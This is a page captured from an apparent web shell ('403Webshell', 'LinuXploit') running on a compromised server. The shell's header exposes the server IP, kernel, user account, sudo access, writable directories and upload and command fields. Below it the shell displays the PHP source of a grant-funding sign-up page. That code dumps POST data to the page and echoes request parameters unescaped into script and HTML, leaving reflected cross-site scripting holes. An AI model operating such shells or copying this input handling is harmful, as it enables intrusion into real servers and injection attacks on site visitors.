403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/americasgotfunding.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/americasgotfunding.com/index_test.php
<?php
require_once($_SERVER['DOCUMENT_ROOT'].'/assets/includes/php_header.php');
$categories = get_categories();
$education_questions = get_education_questions();
function sub_question_recursive($q) {
	global $education_questions;
	if(isset($education_questions['subquestions'][$q])) {
		foreach($education_questions['subquestions'][$q] as $s=>$d) { ?>
			<div class="<?= $q;?>_sub" style="padding:5px 5px 5px 20px;display:block;clear:both;">
			<?= $d['name'];?><br/>
			<?php if($d['type']=='bool') {?>
				<label><input type="radio" value="1" name="<?= $s;?>" id="<?= $s;?>_yes" /> Yes</label>
				<label><input type="radio" value="0" name="<?= $s;?>" id="<?= $s;?>_no" /> No</label>
				<br/>
			<?php } elseif(strpos($d['type'],'range') > -1) {
				$range = array();
				$pieces = explode(':',$d['type']);
				$range_limits = explode('-',$pieces[1]);
				for($i=$range_limits[0]; $i<=$range_limits[1]; $i++) {
					$range[$i] = $i;
				} ?>
				<select name="<?= $s;?>" id="<?= $s;?>">
				<option value="">Select</option>
			<?php foreach($range as $i=>$j) {?>
				<option value="<?= $i;?>"><?= $j;?></option>
			<?php }?>
				</select>
			<?php }
			if(isset($education_questions['subquestions'][$s])) {
				sub_question_recursive($s);
			}?>
			</div><?php
		}
	}
}
echo '<pre>'.print_r($_POST,true).'</pre>';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>America's Got Funding</title>
<link href="/lp2/assets/css/style.css" type="text/css" rel="stylesheet" />
<link href="/lp2/assets/css/sub_styles.css" type="text/css" rel="stylesheet" />
<script language="javascript" type="text/javascript" src="/assets/js/jquery-1.4.2.min.js"></script>
<script language="javascript" type="text/javascript">
	$(document).ready(function() {
		$('.subcategory,.subtext,#education_questions').hide().find('input,select,textarea').attr('disabled','disabled');
		$('input[name=category_id]').click(function() {
			$('.subcategory,.subtext').slideUp().find('input,select,textarea').attr('disabled','disabled');
			$(this).parent().find('.subcategory,.subtext').slideDown().find('input,select,textarea').removeAttr('disabled');

			var granttype = this.className;
			$('#granttype_input').val(granttype);
			
			var amount_needed = $('select[name=app_amount_needed]').val();
			if(granttype == 'business') {
				$('#amount_needed').html('<select name="app_amount_needed"><option selected>Select</option><option value="$500 - $10,000">$500 - $10,000</option><option value="$10,000 - $25,000">$10,000 - $25,000</option><option value="$25,000 - $50,000">$25,000 - $50,000</option><option value="$50,000 - $100,000">$50,000 - $100,000</option><option value="$100,000 - $250,000">$100,000 - $250,000</option><option value="$250,000 - $500,000">$250,000 - $500,000</option><option value="$500,000 - $1,000,000">$500,000 - $1,000,000</option><option value="$1,000,000 +">$1,000,000 +</option></select>');
			} else {
				$('#amount_needed').html('<select name="app_amount_needed"><option selected>Select</option><option value="$500 - $10,000">$500 - $10,000</option><option value="$10,000 - $25,000">$10,000 - $25,000</option><option value="$25,000 - $50,000">$25,000 - $50,000</option><option value="$50,000 - $100,000">$50,000 - $100,000</option><option value="$100,000 or More">$100,000 or More</option></select>');
			}
			if(granttype == 'education') {
				$('#education_questions').show('slow').find('input,select,textarea').removeAttr('disabled');
			} else {
				$('#education_questions').hide('slow').find('input,select,textarea').attr('disabled','disabled');
			}
			$('select[name=app_amount_needed]').val(amount_needed);
		});
		<?php
			foreach($education_questions['subquestions'] as $slug=>$data) {
				echo "$('.".$slug."_sub').hide().find('input,select,textarea').attr('disabled','disabled');";
				echo "$('#".$slug."_yes').click(function() {
					$('.".$slug."_sub').slideDown().find('input,select,textarea').removeAttr('disabled');
				});";
				echo "$('#".$slug."_no').click(function() {
					$('.".$slug."_sub').slideUp().find('input,select,textarea').attr('disabled','disabled');
				});";
				
			}
			if(!empty($_REQUEST)) {
				echo "$('input:radio[name=category_id]').filter('[value={$_REQUEST['category_id']}]').click();\n";
			}
		?>
		//IE doesn't handle labels with images properly
		if($.browser.msie) {
			$("label img").click(function() {
				$("#" + $(this).parents("label").attr("for")).click();
			});
		}
	});

	var prettynames = {
		category_id:"Funding Category",
		cc_fname:"First Name",
		cc_lname:"Last Name",
		cc_addr:"Address",
		cc_city:"City",
		cc_state:"State",
		cc_zip:"Zip",
		cc_phonearea:"Phone Number Area Code",
		cc_phoneprefix:"Phone Number Prefix",
		cc_phoneextension:"Phone Number Ending",
		cc_email:"Email Address",
		app_gender:"Gender",
		app_citizenship:"Citizenship",
		app_age:"Your age",
		app_amount_needed:"The amount needed",
		app_usedescription:"Describe what you will use the money for",
		app_uniqueness:"Uniqueness",

		diploma:"Do you have a high school diploma or GED?",
		online_business:"Would you like to start an online business to make money while you go to school if we could help pay for your training?",
		serious_scale:"In a scale of 1-10 how serious are you about getting a degree online?",
		college:"Have you gone to college?",
		degree:"Do you have a degree?",
		willing_second_degree:"Are you willing to get a second degree in business?",
		have_computer:"Do you have access to a computer for taking the online classes and working on your business?"
	};

	function isblank(str) {
		return ($.trim(str)=='') ? true : false;
	}
	function verify(f) {
		// Loop through each element of the form and validate each item
		//
		// Set the parameters for each field to be valid
		// If a field doesn't have any modifiers it is assumed to be 
		// a text field that can not be blank.
		
		f.cc_phonearea.requiredlength = 3;
		f.cc_phonearea.numeric = true;
		
		f.cc_phoneprefix.requiredlength = 3;
		f.cc_phoneprefix.numeric = true;
		
		f.cc_phoneextension.requiredlength = 4;
		f.cc_phoneextension.numeric = true;
		
		f.cc_zip.requiredlength = 5;
		f.cc_zip.numeric = true;
		
			
		var msg;
		var empty_fields = "";
		var errors = "";
		
		for (var i=0; i < f.length; i++)
		{	
			var element = f.elements[i];
			//document.getElementById('errorconsole').innerHTML += element.name + ":" + element.type + "<br>";
			if($(element).is(':hidden')) {
				continue;
			}

			if ((element.type == 'text' || element.type == 'textarea') && (element.name != 'granttype_other'))
			{
				if ( (element.value == null || element.value == "") || isblank(element.value) )
				{
					empty_fields += "\n        " + prettynames[element.name];
					continue;
				}
				if (element.numeric)
				{
					var v = parseFloat(element.value);
					if (isNaN(v))
					{
						errors +="- The field " + prettynames[element.name] + " must be a number\n";
					}
				}
				if ( (element.requiredlength > 0) && (element.value.length != element.requiredlength) )
				{
					errors += "- The field " + prettynames[element.name] + " must be " + element.requiredlength + " digits long\n";
				}
			}
			else if (element.type == 'select-one')
			{
				// The first option, option[0] can not be selected
				if ( (element.value == null || element.value == "" || element.selectedIndex == 0) || isblank(element.value) )
				{
					empty_fields += "\n        " + prettynames[element.name];
					continue;
				}
			}
			else if (element.type == 'radio')
			{
				if (!$('[name='+element.name+']:checked').val() && empty_fields.indexOf(prettynames[element.name]) == -1)
				{
					empty_fields += "\n        " + prettynames[element.name];
					continue;
				}
			}
		}
		
		
		
		if (!empty_fields && !errors) { return true; }
		
		msg		 = "__________________________________\n\n";
		msg		+= "The form was not submitted because of the following error(s).\n";
		msg		+= "Please correct these error(s) and re-submit.\n";
		msg		+= "__________________________________\n\n";
		
		if (empty_fields) 
		{
			msg += "- The following required field(s) are empty:" + empty_fields + "\n";
			if (errors) { msg += "\n"; }
		}
		msg += errors;
		alert(msg);
		return false;
	}
</script>
</head>

<body id="index">
<div class="size cen">
	<table cellpadding="0" cellspacing="0" border="0" class="index_logo size">
    	<tr>
        	<td></td>
        	<td class="funding_tp"></td>
        </tr>
    </table>
	<div class="index_top size">
    	<table cellpadding="0" cellspacing="0" border="0" class="data">
        	<tr>
            	<td class="data_tl"></td>
            	<td class="data_tp1"></td>
                <td class="data_tp2"></td>
            	<td class="data_tr"><img src="/lp2/assets/images/funding_ri.png" /></td>
            </tr>
        	<tr>
            	<td class="data_le"></td>
            	<td class="data_in" valign="top">
                    <h1 style="margin-top:0px">WHO'S GIVING OUT MONEY?</h1>
                    <p>The government, foundations, and corporations that's who!  These (and other) organizations gift <strong>billions of dollars each year</strong> to Americans for nearly innumerable reasons: education, business start-up or expansion, real estate purchases, inventions, research, community development . . . the list goes on and on!  New funding opportunities are becoming available all the time.</p>  
                    
                    <h1>WHO QUALIFIES?</h1>
                    <p>Probably you!  Funding is offered to so many different categories of people and needs.  Here are some:</p>
                    
                    <table class="format_table" width="470">
                        <tr>
                            <td valign="top" width="40%">
                                <ul>
                                    <li>Disabled</li>
                                    <li>Seniors</li>
                                    <li>Minorities</li>
                                    <li>Faith-based Organizations</li>
                                    <li>Women</li>
                                    <li>Inventors</li>
                                    <li>Medical Research</li>
                                    <li>Small and Large Businesses</li>
                                    <li>Non-profit Organizations</li>
                                </ul>
                            </td>
                            <td valign="top" width="45%">
                                <ul>
                                    <li>Community Development</li>
                                    <li>Historical Building Restoration</li>
                                    <li>Education and Tuition</li>
                                    <li>Housing and Real Estate</li>
                                    <li>Personal Assistance</li>
                                    <li>Rent Assistance</li>
                                    <li>Home Repair</li>
                                    <li>Child Care</li>
                                </ul>
                            </td>
                        </tr>
                    </table>                    
                        
                    <p>Now, to be fair, not everyone qualifies for funding.  For example, government funding is not available for personal expenses or paying off debt.  And all funding has eligibility requirements.  But people and organizations are often surprised to learn that they do qualify, even when they didn't think they did.  For example, <strong>funding for first-time home buyers aren't just for first-time home buyers:</strong> people who haven't owned a home in three years also qualify!  Additionally, there may be categories that fit you that you don't even know exist.  That's why it's so essential to have a mentor, with all the information, to guide you through this process.</p>
                    
                    <!--div class="news"><img src="/assets/images/news_washingtonpost.jpg" class="cen apply" /></div-->
                    
                    <h1>TEAM UP!</h1>
                    <p>The process of researching funding resources, applying for funding, and writing funding proposals can be long and detailed.  It can be overwhelming, especially for someone without experience.  You may feel like you need a team of people to help you.  That's what the people at <?=$_SITE_NAME;?> are: <strong>your team of experts!</strong>  We offer all the tools you need to successfully apply for the right funding.  With the right people supporting you, the entire process will become easier: organized, manageable, and realistic.  You won't believe what you can accomplish for yourself, often with no required pay-back!</p>
                    
                    <h1>HOW DO I START?</h1>
                    <p><?=$_SITE_NAME;?> offers a members-only website with all the information you need to successfully launch your quest for funding. <strong>We assist you with the entire process:</strong> finding the funds you qualify for, organizing the application, writing a proposal, and following up.  We charge a small fee of $<?=number_format($_INITIAL_FEE,2);?> for you to have unlimited access to our members-only site.  This fee comes with a <strong>guarantee</strong>: If you don't qualify for a free program, your entire total payment will be refunded to you immediately, just need to provide the denial letter from the funder.  You either find funding that suits you or you pay nothing!  The members-only site offers unbelievable resources much of it you'd only find through extensive research and reading dozens of funding books.  And our team keeps researching and updating the website all the time.  Your payment helps cover the research required to keep the site updated and all the information current.</p>
                    
                    <a name="apply"></a>
                    <h1>REGISTRATION FORM</h1>
                    <form id="form" action="https://<?= $_SERVER['SERVER_NAME'].'/order.php'?>" method="post" name="apply" onsubmit="return verify(this);">
                    <div class="form">
                        <div class="note">Check the area of funding you are interested in:</div>
                        <table cellpadding="0" cellspacing="0" border="0" class="form_table">
                            <tr>
                                <td>
                                	<?php if(!empty($categories)) {?>
                                		<table id="main-categories" cellpadding="2" cellspacing="3" class="grant_category">
                                		<?php
                                		function get_subcats($cat,$categories) {
                                			$subcats = array();
                                			foreach($categories['subcategories'] as $key=>$value) {
                                				if(isset($value['categories'][$cat])) {
                                					$subcats[$key] = $categories['subcategories'][$key];
                                				}
                                			}
                                			return $subcats;
                                		}
                                		foreach($categories['categories'] as $key=>$cat) {
											$subcats = get_subcats($key,$categories);
                                			?>
                                				<tr>
                                					<td>
                                						<input type="radio" name="category_id" id="<?= $key;?>-<?= $cat['slug'];?>" class="<?= $cat['slug'];?>" value="<?= $key;?>" <?= (isset($_REQUEST['category_id']) && $_REQUEST['category_id']==$key) ? 'checked=true' : null;?> />
                                						<label for="<?= $key;?>-<?= $cat['slug'];?>" title="<?= $cat['name'];?> - <?= $cat['description'];?>"><img src="/lp2/assets/images/label_<?= $cat['slug'];?>.jpg" /></label>
                                						<p style="display:none;"><?= $cat['description'];?></p>
														<?php foreach($subcats as $k=>$c) {	?>
															<div class="subcategory <?= $cat['slug'];?>">
															<input id="<?= $cat['slug'];?>-<?= $k;?>-<?= $c['slug'];?>" type="checkbox" name="subcategories[]" value="<?= $k;?>" <?= (isset($_REQUEST['subcategories']) && in_array($k,$_REQUEST['subcategories'])) ? 'checked=true' : null;?> />
															<label for="<?= $cat['slug'];?>-<?= $k;?>-<?= $c['slug'];?>"><?= $c['name'];?></label>
														</div>
														<?php } ?>
														<?php if($cat['slug']=='personal') { ?>
															<p class="subtext" style="clear:left;padding-top: 5px;margin: 0px 10px;font-size: 10px;font-style: italic;">*There are many Personal Assistance Programs that you can apply for as long as you meet the criteria, however there are no Government Grants to pay off your credit cards or debt.</p>
														<?php }?>
                                					</td>
                                				</tr>
                                			<?php } ?>
                                		</table>
                                	<?php }?>
                                </td>
                            </tr>
                        </table>
                        
                        <table cellpadding="0" cellspacing="0" border="0" class="form_table" id="education_questions">
                        <?php foreach($education_questions['questions'] as $slug=>$data) {?>
                        	<tr>
                        		<td><?= $data['name'];?></td>
                        	</tr>
                        	<tr>
                        		<td>
                        			<?php if($data['type']=='bool') {?>
                        			<label><input type="radio" value="1" name="<?= $slug;?>" id="<?= $slug;?>_yes" /> Yes</label>
                        			<label><input type="radio" value="0" name="<?= $slug;?>" id="<?= $slug;?>_no" /> No</label>
                        			<?php } elseif(strpos($data['type'],'range') > -1) {
                        				$range = array();
                        				$pieces = explode(':',$data['type']);
                        				$range_limits = explode('-',$pieces[1]);
                        				for($i=$range_limits[0]; $i<=$range_limits[1]; $i++) {
                        					$range[$i] = $i;
                        				}
                        			?>
                        			<select name="<?= $slug;?>" id="<?= $slug;?>">
                        			<option value="">Select</option>
                        				<?php foreach($range as $i=>$j) {?>
                        					<option value="<?= $i;?>"><?= $j;?></option>
                        				<?php }?>
                        			</select>
                        			<?php }
                        	sub_question_recursive($slug);
                        			?>
                        		</td>
                        	</tr>
                        <?php } ?>
                        </table>
                        
                        <table cellpadding="0" cellspacing="0" border="0" class="form_table">
                            <tr>
                                <td>How much money are you looking for?</td>
                            </tr>
                            <tr>
                                <td id="amount_needed"><select name="app_amount_needed">
                                    <option value="" selected="selected">Select...</option>
                                    <option value="$500-$10,000">$500 - $10,000</option>
                                    <option value="$10,000 - $25,000">$10,000 - $25,000</option>
                                    <option value="$25,000 - $50,000">$25,000 - $50,000</option>
                                    <option value="$50,000 - $100,000">$50,000 - $100,000</option>
                                    <option value="$100,000 or More">$100,000 or More</option>
                                </select></td>
                            </tr>
                            <tr>
                                <td>Describe in detail how you'll use the money:</td>
                            </tr>
                            <tr>
                                <td><textarea name="app_usedescription"></textarea></td>
                            </tr>
                            <tr>
                                <td>What makes you the ideal candidate for this funding?</td>
                            </tr>
                            <tr>
                                <td><textarea name="app_uniqueness"></textarea></td>
                            </tr>
                        </table>                                     
                        <table cellpadding="0" cellspacing="0" border="0" class="form_table">
                            <tr>
                                <td>citizenship</td>
                                <td>age</td>
                                <td colspan="2">gender</td>
                            </tr>
                            <tr>
                                <td><select class="third_" name="app_citizenship">
                                    <option value="" >Select</option>
                                    <option value="citizen" >U.S. Citizen</option>
                                    <option value="resident" >Resident Alien</option>
                                    <option value="greencard" >Green Card Holder</option>
                                    <option value="permanent" >Permanent Resident</option>
                                    <option value="unsure" >Not Sure</option>
                                </select></td>
                                <td><input type="text" maxlength="3" class="third" name="app_age" onkeyup="valNum(this)" value="" /></td>
                                <td colspan="2">
                                    <label><input type="radio" name="app_gender" class="radio" value="male"  />male</label>
                                    <label><input type="radio" name="app_gender" class="radio" value="female"  />female</label>
                                </td>
                            </tr>
                        </table>
                        <table cellpadding="0" cellspacing="0" border="0" class="form_table">
                            <tr>
                                <td colspan="2">first name</td>
                                <td colspan="2">last name</td>
                            </tr>
                            <tr>
                                <td colspan="2"><input type="text" class="full" name="cc_fname" value="" /></td>
                                <td colspan="2"><input type="text" class="full" name="cc_lname" value="" /></td>
                            </tr>
                            <tr>
                                <td colspan="4">street address</td>
                            </tr>
                            <tr>
                                <td colspan="4"><input type="text" class="full_" name="cc_addr" value="" /></td>
                            </tr>
                            <tr>
                                <td colspan="2">city</td>
                                <td>state</td>
                                <td>zip</td>
                            </tr>
                            <tr>
                                <td colspan="2"><input type="text" class="full" name="cc_city" value="" /></td>
                                <td>
                                    <select class="third_" name="cc_state"> 
                                        <option selected="selected">Select</option>
                                                                                            <option value="AL" >Alabama</option>
                                                                                            <option value="AK" >Alaska</option>
                                                                                            <option value="AS" >American Samoa</option>
                                                                                            <option value="AZ" >Arizona</option>
                                                                                            <option value="AR" >Arkansas</option>
                                                                                            <option value="CA" >California</option>
                                                                                            <option value="CO" >Colorado</option>
                                                                                            <option value="CT" >Connecticut</option>
                                                                                            <option value="DE" >Delaware</option>
                                                                                            <option value="DC" >District of Columbia</option>
                                                                                            <option value="FM" >Federated Sates of Micronesia</option>
                                                                                            <option value="FL" >Florida</option>
                                                                                            <option value="GA" >Georgia</option>
                                                                                            <option value="GU" >Guam</option>
                                                                                            <option value="HI" >Hawaii</option>
                                                                                            <option value="ID" >Idaho</option>
                                                                                            <option value="IL" >Illinois</option>
                                                                                            <option value="IN" >Indiana</option>
                                                                                            <option value="IA" >Iowa</option>
                                                                                            <option value="KS" >Kansas</option>
                                                                                            <option value="KY" >Kentucky</option>
                                                                                            <option value="LA" >Louisiana</option>
                                                                                            <option value="ME" >Maine</option>
                                                                                            <option value="MD" >Maryland</option>
                                                                                            <option value="MH" >Marshall Islands</option>
                                                                                            <option value="MA" >Massachusetts</option>
                                                                                            <option value="MI" >Michigan</option>
                                                                                            <option value="MN" >Minnesota</option>
                                                                                            <option value="MS" >Mississippi</option>
                                                                                            <option value="MO" >Missouri</option>
                                                                                            <option value="MT" >Montana</option>
                                                                                            <option value="NE" >Nebraska</option>
                                                                                            <option value="NV" >Nevada</option>
                                                                                            <option value="NH" >New Hampshire</option>
                                                                                            <option value="NJ" >New Jersey</option>
                                                                                            <option value="NM" >New Mexico</option>
                                                                                            <option value="NY" >New York</option>
                                                                                            <option value="NC" >North Carolina</option>
                                                                                            <option value="ND" >North Dakota</option>
                                                                                            <option value="MP" >Northern Mariana Islands</option>
                                                                                            <option value="OH" >Ohio</option>
                                                                                            <option value="OK" >Oklahoma</option>
                                                                                            <option value="OR" >Oregon</option>
                                                                                            <option value="PW" >Palau</option>
                                                                                            <option value="PA" >Pennsylvania</option>
                                                                                            <option value="PR" >Puerto Rico</option>
                                                                                            <option value="RI" >Rhode Island</option>
                                                                                            <option value="SC" >South Carolina</option>
                                                                                            <option value="SD" >South Dakota</option>
                                                                                            <option value="TN" >Tennessee</option>
                                                                                            <option value="TX" >Texas</option>
                                                                                            <option value="UT" >Utah</option>
                                                                                            <option value="VT" >Vermont</option>
                                                                                            <option value="VI" >Virgin Islands</option>
                                                                                            <option value="VA" >Virginia</option>
                                                                                            <option value="WA" >Washington</option>
                                                                                            <option value="WV" >West Virginia</option>
                                                                                            <option value="WI" >Wisconsin</option>
                                                                                            <option value="WY" >Wyoming</option>
                                                                                        </select>
                                </td>
                                <td><input type="text" class="third" maxlength="5" name="cc_zip" onkeyup="valNum(this);" value="" /></td>
                            </tr>
                            <tr>
                                <td colspan="2">phone</td>
                                <td colspan="3">email</td>
                            </tr>
                            <tr>
                               <td colspan="2" style="font-size:20px">
                                    (&nbsp;<input name="cc_phonearea" maxlength="3" type="text" class="phn" onkeydown="TabNext(this,'down',3)"
                                        onkeyup="TabNext(this,'up',3,this.form.cc_phoneprefix);valNum(this)" value="" />&nbsp;)
                                    <input name="cc_phoneprefix" maxlength="3" type="text" class="phn" onkeydown="TabNext(this,'down',3)"
                                        onkeyup="TabNext(this,'up',3,this.form.cc_phoneextension);valNum(this)" value="" />&nbsp;-&nbsp;
                                    <input name="cc_phoneextension" maxlength="4" type="text" class="phn2" onkeyup="valNum(this)" value="" /></td>
                                <td colspan="2"><input type="text" class="full" name="cc_email" value="" /></td>
                            </tr>
                            <tr>
                                <td colspan="4"><label><input type="checkbox" name="" value="1" checked="checked" />Yes, inform me of new funding opportunities!</label></td>
                            </tr>
                            <tr>
                           		<td colspan="4">
                           			<input type="hidden" id="granttype_input" name="granttype" value="<?= (isset($_REQUEST['granttype'])) ? $_REQUEST['granttype'] : null; ?>" />
				                	<input type="hidden" name="application" value="application" />
				                	<input type="hidden" name="tc" value="<?= $tc; ?>" />
				                	<?= $trackerformparams; ?>
                                	<input type="submit" class="submit" value="" />
                                </td>
                            </tr>
                        </table>
                    </div>
                    </form>
                    <!--div class="news"><img src="/assets/images/news_missourian.jpg" class="cen apply" /></div-->
                    
                    <h1>WHY WAIT?</h1>
                    <p>Maybe the application deadline for your perfect funding opportunity is fast-approaching.  How will you know whether there's funding available for you unless you get started right away?  The longer you wait to sign up, the longer you wait for your funding.</p>
                    
                    <!--center><a href="#apply"><img src="/lp2/assets/images/apply.jpg" border="0" style="margin:20px auto" /></a></center-->
                    
                </td>
            	<td class="data_fd" valign="top">
                    <div id="icon">
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/1sthome.jpg" />1st&nbsp;Time Home-buyer Funding</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/childcare.jpg" />Child Care Assistance</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/nonprofit.jpg" />Non-profit Business Funding</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/tuition.jpg" />Tuition Education Funding</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/business.jpg" />Funding for Women</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/women.jpg" />Small Business Funding</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/rent.jpg" />Housing Assistance</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/disaster.jpg" />Disaster Prevention</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/minority.jpg" />Funding for Minorities</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/veteran.jpg" />Veterans Assistance</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/medical.jpg" />Medical Assistance</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/community.jpg" />Non-Profit Community Projects</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/realestate.jpg" />Real Estate Funding</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/disabled.jpg" />Assistance for&nbsp;the Disabled</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/police.jpg" />Crime Prevention</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/nutrition.jpg" />Nutrition and Food Assistance</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/repairs.jpg" />Home Repair Assistance</a></div>
                        <div class="icon"><a href="#apply"><img src="/lp2/assets/images/icons/elderly.jpg" />Assistance for the Elderly</a></div>
                        <div class="icon" style="margin-bottom:20px"><a href="#apply"><img src="/lp2/assets/images/icons/faith.jpg" />Faith-based Funding</a></div>
                        <div class="icon" style="margin-bottom:20px"><a href="#apply"><img src="/lp2/assets/images/icons/utility.jpg" />Utilities Assistance</a></div>
                        <img src="/lp2/assets/images/fundingNews.png" class="image" />
						<img src="/lp2/assets/images/sml_reuters1.jpg" class="image" />
						<img src="/lp2/assets/images/sml_washingtonpost.jpg" class="image" />
						<img src="/lp2/assets/images/sml_kernvalleysun.jpg" class="image" />
						<img src="/lp2/assets/images/sml_missourian.jpg" class="image" />
						<img src="/lp2/assets/images/sml_reuters2.jpg" class="image" />
						<img src="/lp2/assets/images/sml_southcarolinanews.jpg" class="image" />
						<img src="/lp2/assets/images/clientTestimonials.png" class="image" />
						<img src="/lp2/assets/images/sml_stacey.jpg" class="image" />
						<img src="/lp2/assets/images/sml_jessica.jpg" class="image" />
						<img src="/lp2/assets/images/sml_susan.jpg" class="image" />
						<img src="/lp2/assets/images/sml_elizabeth.jpg" class="image" />
                    </div>
				</td>
            	<td class="data_ri" valign="top"><img src="/lp2/assets/images/data_ri_img.png" /></td>
            </tr>
        	<tr>
            	<td class="data_bl"></td>
            	<td class="data_bt" colspan="2"></td>
            	<td class="data_br"></td>
            </tr>
        </table>
    </div>
    <div class="links">
        <ul>
            <li><a href="/index?tc=<?= $tc; ?><?= $params; ?>">Home</a></li>
            <li>|</li>
            <li><a href="/login?tc=<?= $tc; ?><?= $params; ?>">Login</a></li>
            <li>|</li>
            <li><a href="/terms?tc=<?= $tc; ?><?= $params; ?>">Terms</a></li>
            <li>|</li>
            <li><a href="/privacy?tc=<?= $tc; ?><?= $params; ?>">Privacy&nbsp;<small>(updated February 5, 2010)</small></a></li>
            <li>|</li>
            <li><a href="/contact?tc=<?= $tc; ?><?= $params; ?>">Contact Us</a></li>
        </ul>
        <p style="margin-top:10px;">&copy; 2010 America's Got Funding. All rights reserved.</p>
    </div>
</div>

<?php if (isset($_SERVER['HTTPS'])) : ?>
	<img src="https://www.surfcrm.com/tracker/server/tracker.php?<?= $trackerparams; ?>" />  	
<?php else : ?> 
	<img src="http://www.surfcrm.com/tracker/server/tracker.php?<?= $trackerparams; ?>" />
<?php endif; ?>
<!--BEGIN Google Analytics Code for every page -->
<script type="text/javascript">
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-18289459-1']);
  _gaq.push(['_setDomainName', '.americasgotfunding.com']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();
</script>
<!-- END Google Analytics Code for every page -->
<?php if (isset($use_vsa) && $use_vsa && $special_order != '1') : ?>
	<!-- so: <?=$special_order;?> //-->
	<script language="javascript" src="/vsa/callagent.php?cid=1"></script>
<?php endif; ?>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit